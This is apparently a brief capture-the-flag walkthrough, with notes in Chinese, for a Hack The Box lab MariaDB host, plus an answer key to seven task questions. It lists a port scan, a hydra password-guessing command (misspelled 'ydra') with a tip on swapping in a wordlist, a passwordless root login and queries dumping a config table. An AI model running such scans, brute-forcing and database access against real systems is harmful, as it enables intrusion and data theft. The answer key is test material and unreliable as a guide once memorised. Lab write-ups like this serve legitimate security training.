扫描, 发现3306端口开放
nmap -A 10.129.95.232
弱密码,密码为空,如果破解其他密码可以把 -e nsr 换成字典路径即可
ydra -l root -e nsr mysql://10.129.95.232
登录mysql
mysql -uroot -h 10.129.95.232
show databases; #列数据库
use htb; #切换数据库
show tables; # 列表
select * from config; #获取表中数据
-
Task 1 During our scan, which port do we find serving MySQL?
3306 -
Task 2 What community-developed MySQL version is the target running?
MariaDB -
Task 3 When using the MySQL command line client, what switch do we need to use in order to specify a login username?
-u -
Task 4 Which username allows us to log into this MariaDB instance without providing a password?
root -
Task 5 In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
* -
Task 6 In SQL, what symbol do we need to end each query with?
; -
Task 7 There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
htb